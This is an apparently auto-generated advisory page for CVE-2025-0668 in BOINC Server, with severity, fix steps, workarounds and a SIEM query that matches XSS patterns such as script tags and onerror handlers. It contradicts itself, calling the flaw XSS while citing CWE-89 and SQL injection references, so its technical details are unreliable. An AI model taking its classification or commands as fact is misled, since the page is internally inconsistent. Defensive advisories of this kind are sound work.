CVE-2025-0668 – This CVE describes a stored cross-site scriptin... (How to Fix)

Q: What is the severity of CVE-2025-0668?

CVE-2025-0668 has a CVSS score of 9.8 (CRITICAL). This CVE describes a stored cross-site scripting (XSS) vulnerability in BOINC Server that allows attackers to inject malicious scripts into web pages. The vulnerability affects BOINC Server versions before 1.4.5 and could enable attackers to steal session cookies, perform actions as authenticated users, or deface websites. Anyone running vulnerable BOINC Server instances is affected.

📋 TL;DR

This CVE describes a stored cross-site scripting (XSS) vulnerability in BOINC Server that allows attackers to inject malicious scripts into web pages. The vulnerability affects BOINC Server versions before 1.4.5 and could enable attackers to steal session cookies, perform actions as authenticated users, or deface websites. Anyone running vulnerable BOINC Server instances is affected.

💻 Affected Systems

Products:

BOINC Server

Versions: All versions before 1.4.5

Operating Systems: All platforms running BOINC Server

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the web interface component of BOINC Server where user input is not properly sanitized before being included in generated web pages.

📦 What is this software?

Boinc Server by Universityofcalifornia

View all CVEs affecting Boinc Server →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator credentials, take full control of the BOINC server, compromise user accounts, and potentially pivot to other systems in the network.

🟠

Likely Case

Attackers inject malicious JavaScript to steal session cookies, perform actions as authenticated users, or deface the BOINC web interface.

🟢

If Mitigated

With proper input validation and output encoding, the malicious scripts would be rendered harmless as text rather than executable code.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

While the CWE is listed as CWE-89 (SQL Injection), the description indicates XSS. The provided references discuss SQL injection vulnerabilities in BOINC, suggesting this advisory may contain multiple vulnerability types.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.4.5

Vendor Advisory: https://boinc.berkeley.edu/

Restart Required: Yes

Instructions:

1. Backup your BOINC Server configuration and data. 2. Download BOINC Server version 1.4.5 or later from the official website. 3. Stop the BOINC Server service. 4. Install the updated version. 5. Restart the BOINC Server service. 6. Verify the installation by checking the version.

🔧 Temporary Workarounds

Implement Web Application Firewall (WAF)

all

Deploy a WAF with XSS protection rules to filter malicious input before it reaches the BOINC Server.

Input Validation Filter

all

Implement additional input validation at the web server or reverse proxy level to sanitize user input.

🧯 If You Can't Patch

Isolate the BOINC Server behind a reverse proxy with strict input validation and XSS filtering
Implement Content Security Policy (CSP) headers to restrict script execution sources

🔍 How to Verify

Check if Vulnerable:

Check the BOINC Server version by accessing the web interface or checking the server logs for version information.

Check Version:

On Linux: 'boinc --version' or check the web interface. On Windows: Check the installed program version in Control Panel or run 'boinc.exe --version' from command line.

Verify Fix Applied:

After patching, verify the version is 1.4.5 or later and test input fields for proper sanitization by attempting to inject basic XSS payloads in a controlled manner.

📡 Detection & Monitoring

Log Indicators:

Unusual JavaScript or HTML patterns in user input fields
Multiple failed login attempts followed by successful login from same IP
Unexpected changes to web page content

Network Indicators:

HTTP requests containing suspicious script tags or JavaScript code in parameters
Unusual outbound connections from the BOINC server

SIEM Query:

source="boinc_server" AND (http_request="*<script*" OR http_request="*javascript:*" OR http_request="*onerror=*" OR http_request="*onload=*")

📊 Metadata

CVE ID: CVE-2025-0668

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-89

EPSS Score: 0.19% exploit probability (40.3th percentile)

Published: May 7, 2025

Last Updated: July 8, 2025

🔗 References

https://www.compass-security.com/fileadmin/Research/Advisories/2025_03_CSNC-2025-004_BOINC_multiple_SQLi.txt Exploit,Third Party Advisory
https://www.compass-security.com/fileadmin/Research/Advisories/2025_03_CSNC-2025-004_BOINC_multiple_SQLi.txt Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-0668, you might also want to check these: